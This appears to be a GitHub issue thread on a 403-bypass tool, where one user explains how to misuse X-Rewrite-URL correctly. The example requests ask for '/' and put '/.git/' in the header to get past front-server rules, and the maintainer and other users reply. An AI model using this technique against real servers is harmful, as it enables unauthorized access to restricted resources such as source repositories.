X-Original-Url / X-Rewrite-Url bypass

[rumiljonov]

Hey, I think you are using X-Original-Url / X-Rewrite-Url vector in a wrong way. These headers usually help to bypass front server rules, which are based on URI, but you don't change URI while using these headers.

First, normal request returns 403:

GET /.git/ HTTP/1.1
Host: example.com

This attempt to bypass will return 403 too, because URI hasn't changed and the rule still applies:

GET /.git/ HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/

This one should bypass the restriction:

GET / HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/

[sting8k]

Thank you, fixed in new update.

[abdulx01]

Hy, I also check this method: but it's home page in code response

[ler-exploit]

Hy, je vérifie aussi cette méthode: mais c'est la page d'accueil en réponse de code

i have the same problem, did you fix it??